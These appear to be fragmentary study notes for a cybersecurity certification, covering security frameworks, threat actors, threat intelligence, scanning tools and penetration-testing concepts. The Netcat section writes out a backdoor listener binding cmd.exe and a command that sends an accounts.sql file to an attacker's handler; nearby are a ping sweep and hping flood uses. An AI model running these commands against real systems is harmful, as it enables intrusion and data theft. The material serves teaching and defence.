§  Identify—develop security policies and capabilities. Evaluate risks, threats, and vulnerabilities and recommend security controls to mitigate them.

§  Protect—procure/develop, install, operate, and decommission IT hardware and software assets with security as an embedded requirement of every stage of this operations life cycle.

§  Detect—perform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats.

§  Respond—identify, analyze, contain, and eradicate threats to systems and data security.

§  Recover—implement cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks.

§  Overall internal responsibility for security might be allocated to a dedicated department, run by a Director of Security, Chief Security Officer (CSO), or Chief Information Security Officer (CISO). Historically, responsibility for security might have been allocated to an existing business unit, such as Information and Communications Technology (ICT) or accounting. 

§Information Systems Security Officer (ISSO).

Technical and specialist staff have responsibility for implementing, maintaining, and monitoring the policy. Security might be made a core competency of systems and network administrators, or there may be dedicated security administrators. One such job title is Information Systems Security Officer (ISSO).

A security operations center (SOC) is a location where security professionals monitor and protect critical information assets across other business functions, such as finance, operations, sales/marketing, and so on. Because SOCs can be difficult to establish, maintain, and finance, they are usually employed by larger corporations, like a government agency or a healthcare company. 

DevSecOps 

DevSecOps extends the boundary to security specialists and personnel, reflecting the principle that security is a primary consideration at every stage of software development and deployment. This is also known as shift left, meaning that security considerations need to be made during requirements and planning phases, not grafted on at the end. The principle of DevSecOps recognizes this and shows that security expertise must be embedded into any development project. Ancillary to this is the recognition that security operations can be conceived of as software development projects. Security tools can be automated through code. Consequently, security operations need to take on developer expertise to improve detection and monitoring.

Network operations and use of cloud computing make ever-increasing use of automation through software code. Traditionally, software code would be the responsibility of a programming or development team. Separate development and operations departments or teams can lead to silos, where each team does not work effectively with the other. 

Incident Response

A dedicated cyber incident response team (CIRT), a computer security incident response team (CSIRT), or a computer emergency response team (CERT), can be used as a single or partnered point-of-contact for the notification of security incidents. This function might be handled by the SOC, or it might be established as an independent business unit.

§  Technical—the control is implemented as a system (hardware, software, or firmware). For example, firewalls, antivirus software, and OS access control models are technical controls. Technical controls may also be described as logical controls.

§  Operational—the control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls rather than technical controls.

§  Managerial—the control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

§  the control acts to eliminate or reduce the impact of an intrusion event. A corrective control is used after an attack. A good example is a backup system that can restore data that was damaged during an intrusion. Another example is a patch management system that acts to eliminate the vulnerability exploited during the attack.

the control may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. This could include signs and warnings of legal penalties against trespass or intrusion.

The International Organization for Standardization (ISO) has produced a cybersecurity framework in conjunction with the International Electrotechnical Commission (IEC). The framework was established in 2005 and revised in 2013. Unlike the NIST framework, the ISO 27001 Information Security Management standard must be purchased (https://www.iso.org/standard/27001). ISO 27001 is part of an overall 27000 series of information security standards, also known as 27K. Of these, 27002 classifies security controls, 27017 and 27018 reference cloud security, and 27701 focuses on personal data and privacy.

Where ISO 27K is a cybersecurity framework, ISO 31K (iso.org/iso-31000-risk-management.html) is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial, customer service, competition, and legal liability factors. ISO 31K establishes best practices for performing risk assessments.

The not-for-profit organization Cloud Security Alliance (CSA) produces various resources to assist cloud service providers (CSP) in setting up and delivering secure cloud platforms. These resources can also be useful for cloud consumers in evaluating and selecting cloud services.

lists specific controls and assessment guidelines that should be implemented by CSPs. For cloud consumers, the matrix acts as a starting point for cloud contracts and agreements as it provides a baseline level of security competency that the CSP should meet.

Center for Internet Security (CIS)

The Center for Internet Security (cisecurity.org) is a not-for-profit organization (founded partly by The SANS Institute). It publishes the well-known "The CIS Critical Security Controls." The CIS-RAM (Risk Assessment Method) can be used to perform an overall evaluation of security posture (learn.cisecurity.org/cis-ram).

CIS also produces benchmarks for different aspects of cybersecurity. For example, there are benchmarks for compliance with IT frameworks and compliance programs, such as PCI DSS, NIST 800-53, SOX, and ISO 27000. There are also product-focused benchmarks, such as for Windows Desktop, Windows Server, macOS, Linux, Cisco, web browsers, web servers, database and email servers, and VMware ESXi. The CIS-CAT (Configuration Access Tool) can be used with automated vulnerability scanners to test compliance against these benchmarks (cisecurity.org/cybersecurity-tools/cis-cat-pro/cis-cat-faq).

Application Servers

Most application architectures use a client/server model. This means that part of the application is a client software program, installed and run on separate hardware to the server application code. The client interacts with the server over a network. Attacks can therefore be directed at the local client code, at the server application, or at the network channel between them. As well as coding issues, the applications need to take account of platform issues. The client application might be running in a computing host alongside other, potentially malicious, software. Code that runs on the client should not be trusted. The server-side code should implement routines to verify that input conforms to what is expected.

Web Server Applications

A web application is a particular type of client/server architecture. A web application leverages existing technologies to simplify development. The application uses a generic client (a web browser), and standard network protocols and servers (HTTP/HTTPS). The specific features of the application are developed using code running on the clients and servers. Web applications are also likely to use a multi-tier architecture, where the server part is split between application logic and data storage and retrieval. Modern web applications may use even more distributed architectures, such as microservices and serverless.

The Open Web Application Security Project (OWASP) is a not-for-profit, online community that publishes several secure application development resources, such as the Top 10 list of the most critical application security risks (owasp.org/www-project-top-ten). OWASP has also developed resources, such as the Zed Attack Proxy and Juice Shop (a deliberately unsecure web application), to help investigate and understand penetration testing and application security issues.

In the US, for example, the Sarbanes-Oxley Act (SOX) mandates the implementation of risk assessments, internal controls, and audit procedures.

In 2002, the Federal Information Security Management Act (FISMA) was introduced to govern the security of data processed by federal government agencies. 

Fairness and the right to privacy, as enacted by regulations such as the European Union's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without the individual's informed consent, unless there are other overriding considerations, such as public interest or other legal obligations. 

GDPR gives data subjects rights to withdraw consent, and to inspect, amend, or erase data held about them.

Payment Card Industry Data Security Standard (PCI DSS)

§  Vulnerability is a weakness that could be triggered accidentally or exploited intentionally to cause a security breach. Examples of vulnerabilities include improperly configured or installed hardware or software, delays in applying and testing software and firmware patches, untested software and firmware patches, the misuse of software or communication protocols, poorly designed network architecture, inadequate physical security, insecure password usage, and design flaws in software or operating systems, such as unchecked user input.

§  Threat is the potential for someone or something to exploit a vulnerability and breach security. A threat may be intentional or unintentional. The person or thing that poses the threat is called a threat actor or threat agent. The path or tool used by a malicious threat actor can be referred to as the attack vector.

§  is the likelihood and impact (or consequence) of a threat actor exploiting a vulnerability. To assess risk, you identify a vulnerability and then evaluate the likelihood of it being exploited by a threat and the impact that a successful exploit would have.

An external threat actor or agent is one that has no account or authorized access to the target system. A malicious external threat must infiltrate the security system using malware and/or social engineering. Note that an external actor may perpetrate an attack remotely or on-premises (by breaking into the company's headquarters, for instance). It is the threat actor that is defined as external, rather than the attack method.

Conversely, an internal (or insider) threat actor is one that has been granted permissions on the system. This typically means an employee, but insider threat can also arise from contractors and business partners.

Intent/Motivation 

Hackers 

black hat 
white hat
gray hat hacker

Script Kiddies

A script kiddie is someone who uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal other than gaining attention or proving technical abilities.

A hacktivist group uses cyber weapons to promote a political agenda. Hacktivists might attempt to obtain and release confidential information to the public domain, perform denial of service (DoS) attacks, or deface websites. When considering risks, political, media, and financial groups and companies are likely at greater risk from hacktivist groups.

State actors have been implicated in many attacks, particularly on energy and health network systems. The goals of state actors are primarily espionage and strategic advantage, but it has been known for countries—North Korea being a good example—to target companies purely for commercial gain.

State actors will work at arm's length from the national government, military, or security service that sponsors and protects them, maintaining "plausible deniability." They are likely to pose as independent groups or even as hacktivists. They may wage false flag campaigns that try to implicate other states

 A criminal syndicate can operate across the Internet from different jurisdictions than its victim, increasing the complexity of prosecution. Syndicates will seek any opportunity for criminal profit, but typical activities are financial fraud (both against individuals and companies) and extortion.

Most competitor-driven espionage is thought to be pursued by state actors, but it is not inconceivable that a rogue business might use cyber espionage against its competitors. Such attacks could aim at theft or at disrupting a competitor's business or damaging their reputation. Competitor attacks might be facilitated by employees who have recently changed companies and bring an element of insider knowledge with them.

An insider threat arises from an actor who has been identified by the organization and granted some sort of access. Within this group of internal threats, you can distinguish insiders with permanent privileges, such as employees, from insiders with temporary privileges, such as contractors and guests.

The Computer Emergency Response Team (CERT) at Carnegie Mellon University's definition of a malicious insider is:

Insider threats can be categorized as unintentional. An unintentional or inadvertent insider threat is a vector for an external actor, or a separate—malicious—internal actor to exploit, rather than a threat actor in its own right. Unintentional threats usually arise from lack of awareness or from carelessness, such as users demonstrating poor password management 

. Another example of unintentional insider threat is the concept of shadow IT, where users purchase or introduce computer hardware or software to the workplace without the sanction of the IT department and without going through a procurement and security analysis process. The problem of shadow IT is exacerbated by the proliferation of cloud services and mobile devices, which are easy for users to obtain. Shadow IT creates a new unmonitored attack surface for malicious adversaries to exploit.

The attack surface is all the points at which a malicious threat actor could try to exploit a vulnerability. 

the attacker either obtains credentials for a remote access or wireless connection to the network or cracks the security protocols used for authentication. Alternatively, the attacker spoofs a trusted resource, such as an access point, and uses it to perform credential harvesting and then uses the stolen account details to access the network.

§  malware may be concealed in files attached to posts or presented as downloads. An attacker may also be able to compromise a site so that it automatically infects vulnerable browser software (a drive-by download). Social media may also be used more subtly, to reinforce a social engineering campaign and drive the adoption of Trojans.

The deep web is any part of the World Wide Web that is not indexed by a search engine. This includes pages that require registration, pages that block search indexing, unlinked pages, pages using nonstandard DNS, and content encoded in a nonstandard manner. Within the deep web, are areas that are deliberately concealed from "regular" browser access.

a network established as an overlay to Internet infrastructure by software, such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize usage and prevent a third party from knowing about the existence of the network or analyzing any activity taking place over the network. Onion routing, for instance, uses multiple layers of encryption and relays between nodes to achieve this anonymity.

lists of IP addresses and domains associated with malicious behavior, plus signatures of known file-based malware.

computer data that can correlate events observed on a customer's own networks and logs with known TTP and threat actor indicators.

Threat data can be packaged as feeds that integrate with a security information and event management (SIEM) platform. These feeds are usually described as cyber threat intelligence (CTI) data. The data on its own is not a complete security solution however. To produce actionable intelligence, the threat data must be correlated with observed data from customer networks. This type of analysis is often powered by artificial intelligence (AI) features of the SIEM.

the threat research and CTI data is made available as a paid subscription to a commercial threat intelligence platform. The security solution provider will also make the most valuable research available early to platform subscribers in the form of blogs, white papers, and webinars. Some examples of such platforms include:

§  some companies operate threat intelligence services on an open-source basis, earning income from consultancy rather than directly from the platform or research effort. Some examples include:

An indicator of compromise (IoC) is a residual sign that an asset or network has been successfully attacked or is continuing to be attacked. Put another way, an IoC is evidence of a TTP.

§  Unauthorized software and files

§  Suspicious emails

§  Suspicious registry and file system changes

§  Unknown port and protocol usage

§  Excessive bandwidth usage

§  Rogue hardware

§  Service disruption and defacement

§  Suspicious or unauthorized account usage

Structured Threat Information eXpression (STIX)

The Structured Threat Information eXpression (STIX) part of the framework describes standard terminology for IoCs and ways of indicating relationships between them.STIX provides the syntax for describing CTI

Automated Indicator Sharing (AIS) is a service the Cybersecurity and Infrastructure Security Agency (CISA) provides to enable real-time exchange of machine-readable cyber threat indicators and defensive measures between public and private-sector organizations. AIS helps to protect the participants of the service and ultimately reduce the prevalence of cyberattacks.

Automated Indicator Sharing (AIS) is a service offered by the Department of Homeland Security (DHS) for companies to participate in threat intelligence sharing (us-cert.gov/ais). It is especially aimed at ISACs, but private companies can join too. AIS is based on the STIX and TAXII standards and protocols. 

File/Code Repositories 

Vulnerability Databases and Vulnerability Feeds
Common Vulnerabilities and Exposures (CVE), 

As well as analyzing adversary tools and behaviors, another source of threat intelligence is identifying vulnerabilities in OS, software application, and firmware code. Security researchers look for vulnerabilities, often for the reward of bug bounties offered by the vendor. Lists of vulnerabilities are stored in databases such as Common Vulnerabilities and Exposures (CVE), operated by Mitre (cve.mitre.org). Information about vulnerabilities is codified as signatures and scanning scripts that can be supplied as feeds to automated vulnerability scanning software.

§  show the configuration assigned to network interface(s) in Windows, including the hardware or media access control (MAC) address, IPv4 and IPv6 addresses, default gateway, and whether the address is static or assigned by DHCP. If the address is DHCP-assigned, the output also shows the address of the DHCP server that provided the lease.

§  show the configuration assigned to network interface(s) in Linux.

probe a host on a particular IP address or host name using Internet Control Message Protocol (ICMP). You can use ping with a simple script to perform a sweep of all the IP addresses in a subnet.§  The following example will scan the 10.1.0.0/24 subnet from a Windows machine:

for /l %i in (1,1,255) do @ping -n 1 -w 100 10.1.0.%i | find /i "reply"

[image]

For auditing, there are enterprise suites, such as Microsoft's System Center products. Such suites can be provided with credentials to perform authorized scans and obtain detailed host information via management protocols, such as the Simple Network Management Protocol (SNMP).

Having identified active IP hosts on the network and gained an idea of the network topology, the next step in network reconnaissance is to work out which operating systems are in use, which network services each host is running, and, if possible, which application software is underpinning those services. This process is described as service discovery. Service discovery can also be used defensively, to probe potential rogue systems and identify the presence of unauthorized network service ports.

theHarvester 

dnsenum 

While you can use tools such as dig and whois to query name records and hosting details and to check that external DNS services are not leaking too much information, a tool such as dnsenum packages a number of tests into a single query (github.com/fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can try to work out the IP address ranges that are in use.

scanless 

Port scanning is difficult to conceal from detection systems, unless it is performed slowly and results are gathered over an extended period. Another option is to disguise the source of probes. To that end, scanless is a tool that uses third-party sites (github.com/vesche/scanless). This sort of tool is also useful in a defensive sense, by scanning for ports and services that are open but shouldn't be.

curl is a command line client for performing data transfers over many types of protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT requests as part of web application vulnerability testing. curl supports many other data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.

Nessus 

The list of services and version information that a host is running can be cross-checked against lists of known software vulnerabilities. This type of scanning is usually performed using automated tools. Nessus, produced by Tenable Network Security (tenable.com/products/nessus/nessus-professional), is one of the best-known commercial vulnerability scanners. It is available in on-premises (Nessus Manager) and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed for smaller networks. The product is free to use for home users but paid for on a subscription basis for enterprises. As a previously open-source program, Nessus also supplies the source code for many other scanners. 

§  Type—filter by host, net, port, or portrange.

§  Direction—filter by source (src) or destination (dst) parameters (host, network, or port).

§  Protocol—filter by a named protocol rather than port number (for example, arp, icmp, ip, ip6, tcp, udp, and so on).

Filter expressions can be combined by using Boolean operators:

§  and (&&)

§  or (||)

§  not (!)

Filter syntax can be made even more detailed by using parentheses to group expressions. A complex filter expression should be enclosed by quotes. For example, the following command filters frames to those with the source IP 10.1.0.100 and destination port 53 or 80:

tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"

A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform traffic analysis. You can either analyze a live capture or open a saved capture (.pcap) file. Protocol analyzers can decode a captured frame to reveal its contents in a readable format. You can choose to view a summary of the frame or choose a more detailed view that provides information on the OSI layer, protocol, function, and data.

§  Host/port detection and firewall testing—like Nmap, hping can be used to probe IP addresses and TCP/UDP ports for responses.

§  Traceroute—if ICMP is blocked on a local network, hping offers alternative ways of mapping out network routes. hping can use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces.

§  Denial of service (DoS)—hping can be used to perform flood-based DoS attacks from randomized source IPs. This can be used in a test environment to determine how well a firewall, IDS, or load balancer responds to such attacks.

tcpreplay 

As the name suggests, tcpreplay takes previously captured traffic that has been saved to a .pcap file and replays it through a network interface (linux.die.net/man/1/tcpreplay). Optionally, fields in the capture can be changed, such as substituting MAC or IP addresses. tcpreplay is useful for analysis purposes. If you have captured suspect traffic, you can replay it through a monitored network interface to test intrusion detection rules.

A remote access trojan (RAT) is malware that gives an adversary the means of remotely accessing the network. From the perspective of security posture assessment, a penetration tester might want to try to establish this sort of connection and attempt to send corporate information over the channel (data exfiltration). If security controls are working properly, this attempt should be defeated (or at least detected). 

An exploitation framework uses the vulnerabilities identified by an automated scanner and launches scripts or software to attempt to deliver matching exploits. This might involve considerable disruption to the target, including service failure, and risk data security.

The framework comprises a database of exploit code, each targeting a particular CVE (Common Vulnerabilities and Exposures). The exploit code can be coupled with modular payloads. Depending on the access obtained via the exploit, the payload code may be used to open a command shell, create a user, install software, and so on. The custom exploit module can then be injected into the target system. The framework may also be able to obfuscate the code so that it can be injected past an intrusion detection system or antivirus software.

The best-known exploit framework is Metasploit (metasploit.com). The platform is open-source software, now maintained by Rapid7. There is a free framework (command line) community edition with installation packages for Linux and Windows. Rapid7 produces pro and express commercial editions of the framework and it can be closely integrated with the Nexpose vulnerability scanner.

NETCAT 

NETCAT 

the following command attempts to connect to the HTTP port on a server and return any banner by sending the "head" HTTP keyword:

echo "head" | nc 10.1.0.1 -v 80

Netcat can also establish connections with remote machines. To configure Netcat as a backdoor, you first set up a listener on the victim system (IP: 10.1.0.1) set to pipe traffic from a program, such as the command interpreter, to its handler:

nc -l -p 666 -e cmd.exe

The following command connects to the listener and grants access to the terminal:

nc 10.1.0.1 666

Used the other way around, Netcat can be used to receive files. For example, on the target system the attacker runs the following:

type accounts.sql | nc 10.1.0.192 6666

On the handler (IP 10.1.0.192), the attacker receives the file using the following command:

nc -l -p 6666 > accounts.sql

Default Settings 

Relying on the manufacturer default settings when deploying an appliance or software applications is one example of weak configuration. It is not sufficient to rely on the vendor to ship products in a default-secure configuration, though many now do. Default settings may leave unsecure interfaces enabled that allow an attacker to compromise the device. Network appliances with weak settings can allow attackers to move through the network unhindered and snoop on traffic.

Unsecured Root Accounts  

The root account, referred to as the default Administrator account in Windows or generically as the superuser, has no restrictions set over system access. A superuser account is used to install the OS. An unsecured root account is one that an adversary is able to gain control of, either by guessing a weak password or by using some local boot attack to set or change the password. Software bugs can also allow root access,These vulnerabilities are extremely serious as they give the threat actor complete control of the system.

Effective user management and authorization policies should be enforced so that the superuser account is highly restricted and administration tasks are performed by least privilege management accounts or roles instead. The default root or Administrator account is usually disabled for login. Even if this type of account is enabled for local (interactive) login, it should not be accessible via remote login mechanisms.

Open Ports and Services 
Some generic steps to harden services to meet a given role include

§  If the service is security-critical (such as a remote administration interface), restrict endpoints that are allowed to access the service by IP address or address range. Alternatively, prevent suspect endpoints from connecting by adding them to the block list, but otherwise allow access.

§  Disable services that are installed by default but that are not needed. Ideally, disable the service on the server itself, but in some circumstances it may be necessary to block the port using a firewall instead.

§  For services that should only be available on the private network, block access to ports at border firewalls or segment the network so that the servers cannot be accessed from external networks.

An unsecure protocol is one that transfers data as cleartext; that is, the protocol does not use encryption for data protection. Lack of encryption also means that there is no secure way to authenticate the endpoints. This allows an attacker to intercept and modify communications, acting as man-in-the-middle (MITM).

Weak Encryption 
Encryption algorithms protect data when it is stored on disk or transferred over a network. Encrypted data should only be accessible to someone with the correct decryption key. Weak encryption vulnerabilities allow unauthorized access to data.

Such vulnerabilities arise in the following circumstances:

§  The key is generated from a simple password, making it vulnerable to guessing attempts by brute-force enumeration (if the password is too short) or dictionary enumeration (if the password is not complex).

§  The algorithm or cipher used for encryption has known weaknesses that allow brute-force enumeration.

§  The key is not distributed securely and can easily fall into the hands of people who are not authorized to decrypt the data.

Errors 

Weakly configured applications may display unformatted error messages under certain conditions. These error messages can be revealing to threat actors probing for vulnerabilities and coding mistakes. Secure coding practices should ensure that if an application fails, it does so "gracefully" without revealing information that could assist the development of an exploit. 

§  is the methods and tools by which an attacker transfers data without authorization from the victim's systems to an external network or media. Unlike a data breach, a data exfiltration event is always intentional and malicious. Data exfiltration is a consequence of a data breach event.

Identity Theft Impacts 

A privacy breach may allow the threat actor to perform identity theft or to sell the data to other malicious actors. The threat actor may obtain account credentials or might be able to use personal details and financial information to make fraudulent credit applications and purchases. 

Compared to data breaches, data loss is where information becomes unavailable, either permanently or temporarily. Availability is sometimes overlooked as a security attribute compared to confidentiality and integrity, but it can have severe impacts on business workflows. If processing systems are brought down by accidental or malicious disaster events, a company may not be able to perform crucial workflows like order processing and fulfillment.

Financial and Reputation Impacts 

All these impacts can have direct financial impacts due to damages, fines, and loss of business. Data/privacy breach and availability loss events will also cause a company's reputation to drop with direct customers. Major events might cause widespread adverse publicity on social media and mainstream media. In anticipation of these impacts, incident handling teams should include public relations (PR) and marketing expertise to minimize reputational damage.

Data Storage 

§  Ensure the same protections for data as though it were stored on-premises, including authorization and access management and encryption.

§  Monitor and audit third-party access to data storage to ensure it is being used only in compliance with data sharing agreements and nondisclosure agreements.

§  Evaluate compliance impacts from storing personal data on a third-party system, such as a cloud provider or backup/archive management service.

Cloud-Based versus On-Premises Risks 

On-premises risks refer to software vulnerabilities, weak configurations, and third-party issues arising from hosts, servers, routers, switches, access points, and firewalls located on a private network installed to private offices or campus buildings. Many companies use cloud services to fully or partly support business workflows. The third-party vendor management, code, and data storage risks discussed previously apply directly to cloud as well as to on-premises. Software and weak configuration risks can also apply, however. They are not the sole responsibility of the cloud service provider (CSP). Clouds operate a shared responsibility model. This means that the cloud service provider is responsible for the security of the cloud, while the cloud consumer is responsible for security in the cloud. The types of software and configuration vulnerabilities that you must assess and monitor vary according to the nature of the service.

SP 800-115 identifies three principal activities within an assessment:

§  Testing the object under assessment to discover vulnerabilities or to prove the effectiveness of security controls.

§  Examining assessment objects to understand the security system and identify any logical weaknesses. This might highlight a lack of security controls or a common misconfiguration.

§  Interviewing personnel to gather information and probe attitudes toward and understanding of security.

Network Vulnerability Scanner 

A network vulnerability scanner, such as Tenable Nessus  or OpenVAS

), is designed to test network hosts, including client PCs, mobile devices, servers, routers, and switches. It examines an organization's on-premises systems, applications, and devices and compares the scan results to configuration templates plus lists of known vulnerabilities. Typical results from a vulnerability assessment will identify missing patches, deviations from baseline configuration templates, and other related vulnerabilities. 

Application and Web Application Scanners 

A dedicated application scanner is configured with more detailed and specific scripts to test for known attacks, as well as scanning for missing patches and weak configurations. The best known class of application scanners are web application scanners. Tools such as Nikto (cirt.net/Nikto2) look for known web exploits, such as SQL injection and cross-site scripting (XSS), and may also analyze source code and database security to detect unsecure programming practices. Other types of application scanners would be optimized for a particular class of software, such as a database server.

Vulnerability feeds make use of common identifiers to facilitate sharing of intelligence data across different platforms. Many vulnerability scanners use the Secure Content Automation Protocol (SCAP) to obtain feed or plug-in updates (scap.nist.gov). As well as providing a mechanism for distributing the feed, SCAP defines ways to compare the actual configuration of a system to a target-secure baseline plus various systems of common identifiers. These identifiers supply a standard means for different products to refer to a vulnerability or platform consistently.

The CVE dictionary provides the principal input for NIST's National Vulnerability Database

The NVD supplements the CVE descriptions with additional analysis, a criticality metric, calculated using the Common Vulnerability Scoring System (CVSS), plus fix information.

CVSS is maintained by the Forum of Incident Response and Security Teams

 CVSS metrics generate a score from 0 to 10 based on characteristics of the vulnerability, such as whether it can be triggered remotely or needs local access, whether user intervention is required, and so on. The scores are banded into descriptions too:

Scan intrusiveness is a measure of how much the scanner interacts with the target. 

Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the types of traffic generated by a device. A passive scanner, the Zeek Network Security Monitor (zeek.org) being one example, analyzes a network capture and tries to identify policy deviations or CVE matches. This type of scanning has the least impact on the network and on hosts, but is less likely to identify vulnerabilities comprehensively. Passive scanning might be used by a threat actor to scan a network stealthily.

means probing the device's configuration using some sort of network connection with the target. Active scanning consumes more network bandwidth and runs the risk of crashing the target of the scan or causing some other sort of outage. Agent-based scanning is also an active technique.

A non-credentialed scan is one that proceeds by directing test packets at a host without being able to log on to the OS or application. The view obtained is the one that the host exposes to an unprivileged user on the network. The test routines may be able to include things such as using default passwords for service accounts and device management interfaces, but they are not given privileged access. While you may discover more weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an attacker who doesn't have specific high-level permissions or total administrative access. Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or when performing web application scanning.

A credentialed scan is given a user account with logon rights to various hosts, plus whatever other permissions are appropriate for the testing routines. This sort of test allows much more in-depth analysis, especially in detecting when applications or security settings may be misconfigured. It also shows what an insider attack, or one where the attacker has compromised a user account, may be able to achieve. A credentialed scan is a more intrusive type of scan than non-credentialed scanning.

Create dedicated network accounts for use by the vulnerability scanner only. Ensure that the credentials for these accounts are stored securely on the scan server

false positive 

You should also be alert to the possibility of false negatives—that is, potential vulnerabilities that are not identified in a scan. This risk can be mitigated somewhat by running repeat scans periodically and by using scanners from more than one vendor. Also, because automated scan plug-ins depend on pre-compiled scripts, they do not reproduce the success that a skilled and determined hacker might be capable of and can therefore create a false sense of security.

Security content automation protocol (SCAP) allows compatible scanners to determine whether a computer meets a configuration baseline.
SCAP uses several components to accomplish this function, but some of the most important are:

§  Open Vulnerability and Assessment Language (OVAL)—an XML schema for describing system security state and querying vulnerability reports and information.

§  Extensible Configuration Checklist Description Format (XCCDF)—an XML schema for developing and auditing best-practice configuration checklists and rules. Previously, best-practice guides might have been written in prose for system administrators to apply manually. XCCDF provides a machine-readable format that can be applied and validated using compatible software.

Some scanners measure systems and configuration settings against best practice frameworks. This is referred to as a compliance scan. This might be necessary for regulatory compliance or you might voluntarily want to conform to externally agreed standards of best practice.

THREAT HUNTING 

Where vulnerability scanning uses lists of patches and standard definitions of baseline configurations, threat hunting is an assessment technique that utilizes insights gained from threat intelligence to proactively discover whether there is evidence of TTPs already present within the network or system.

Where a pen test attempts to achieve some sort of system intrusion or concrete demonstration of weakness, threat hunting is based only on analysis of data within the system. To that extent, it is less potentially disruptive than pen testing.

Threat Hunting general points to observe 

§  Advisories and bulletins—threat hunting is a labor-intensive activity and so needs to be performed with clear goals and resources. Threat hunting usually proceeds according to some hypothesis of possible threat. Security bulletins and advisories from vendors and security researchers about new TTPs and/or vulnerabilities may be the trigger for establishing a threat hunt. For example, if threat intelligence reveals that Windows desktops in many companies are being infected with a new type of malware that is not being blocked by any current malware definitions, you might initiate the following threat-hunting plan to detect whether the malware is also infecting your systems.

Intelligence fusion and threat data—threat hunting can be performed by manual analysis of network and log data, but this is a very lengthy process. An organization with a security information and event management (SIEM) and threat analytics platform can apply intelligence fusion techniques. The analytics platform is kept up to date with a TTP and IoC threat data feed. Analysts can develop queries and filters to correlate threat data against on-premises data from network traffic and logs. This process may also be partially or wholly automated using AI-assisted analysis and correlation.

A penetration test—often shortened to pen test—uses authorized hacking techniques to discover exploitable weaknesses in the target's security systems. Pen testing is also referred to as ethical hacking. 

§  Verify a threat exists—use surveillance, social engineering, network scanners, and vulnerability assessment tools to identify a vector by which vulnerabilities could be exploited.

§  Bypass security controls—look for easy ways to attack the system. For example, if the network is strongly protected by a firewall, is it possible to gain physical access to a computer in the building and run malware from a USB stick?

§  Actively test security controls—probe controls for configuration weaknesses and errors, such as weak passwords or software vulnerabilities.

§  Exploit vulnerabilities—prove that a vulnerability is high risk by exploiting it to gain access to data or install backdoors.

Security assessments might be performed by employees or may be contracted to consultants or other third parties. Rules of engagement specify what activity is permitted or not permitted. These rules should be made explicit in a contractual agreement. For example, a pen test should have a concrete objective and scope rather than a vague type of "Break into the network" aim. There may be systems and data that the penetration tester should not attempt to access or exploit. Where a pen test involves third-party services (such as a cloud provider), authorization to conduct the test must also be sought from the third party.

the consultant is given no privileged information about the network and its security systems. This type of test would require the tester to perform a reconnaissance phase. Black box tests are useful for simulating the behavior of an external threat.

the consultant is given complete access to information about the network. This type of test is sometimes conducted as a follow-up to a black box test to fully evaluate flaws discovered during the black box test. The tester skips the reconnaissance phase in this type of test. White box tests are useful for simulating the behavior of a privileged insider threat.

(or partially known environment)—the consultant is given some information; typically, this would resemble the knowledge of junior or non-IT staff to model particular types of insider threats. This type of test requires partial reconnaissance on the part of the tester. Gray box tests are useful for simulating the behavior of an unprivileged insider threat.

A test where the attacker has no knowledge of the system but where staff are informed that a test will take place is referred to as a blind (or single-blind) test. A test where staff are not made aware that a pen test will take place is referred to as a double-blind test.

§  performs the offensive role to try to infiltrate the target.

performs the defensive role by operating monitoring and alerting controls to detect and prevent the infiltration.

There will also often be a white team, which sets the rules of engagement and monitors the exercise, providing arbitration and guidance, if necessary. If the red team is third party, the white team will include a representative of the consultancy company. One critical task of the white team is to halt the exercise should it become too risky. For example, an actual threat actor may attempt to piggyback a backdoor established by the red team.

In a purple team exercise, the red and blue teams meet for regular debriefs while the exercise is ongoing. The red team might reveal where they have been successful and collaborate with the blue team on working out a detection mechanism. This process might be assisted by purple team members acting as facilitators. The drawback of a purple team exercise is that without blind or double-blind conditions, there is no simulation of a hostile adversary and the stresses of dealing with that.

has more risk of detection. Active techniques might involve gaining physical access to premises or using scanning tools on the target's web services and other networks.

the tester's ability to reconnect to the compromised host and use it as a remote access tool (RAT) or backdoor. To do this, the tester must establish a command and control (C2 or C&C) network to use to control the compromised host, upload additional attack tools, and download exfiltrated data. The connection to the compromised host will typically require a malware executable to run after shut down/log off events and a connection to a network port and the attacker's IP address to be available.

persistence is followed by further reconnaissance, where the pen tester attempts to map out the internal network and discover the services running on it and accounts configured to access it. Moving within the network or accessing data assets are likely to require higher privilege levels. For example, the original malware may have run with local administrator privileges on a client workstation or as the Apache user on a web server. Another exploit might allow malware to execute with system/root privileges, or to use network administrator privileges on other hosts, such as application servers.

gaining control over other hosts. This is done partly to discover more opportunities to widen access (harvesting credentials, detecting software vulnerabilities, and gathering other such "loot"), partly to identify where valuable data assets might be located, and partly to evade detection. Lateral movement usually involves executing the attack tools over remote process shares or using scripting tools, such as PowerShell.

hosts that hold the most valuable data are not normally able to access external networks directly. If the pen tester achieves a foothold on a perimeter server, a pivot allows them to bypass a network boundary and compromise servers on an inside network. A pivot is normally accomplished using remote access and tunneling protocols, such as Secure Shell (SSH), virtual private networking (VPN), or remote desktop.

for a threat actor, this means stealing data from one or more systems (data exfiltration). From the perspective of a pen tester, it would be a matter of the scope definition whether this would be attempted. In most cases, it is usually sufficient to show that actions on objectives could be achieved.

Social engineering refers to means of either eliciting information from someone or getting them to perform some action for the threat actor. It can also be referred to as "hacking the human." Social engineering might be used to gather intelligence as reconnaissance in preparation for an intrusion, or it might be used to effect an actual intrusion.

Dumpster Diving

Dumpster diving refers to combing through an organization's (or individual's) garbage to try to find useful documents (or even files stored on discarded removable media).

Piggy backing 

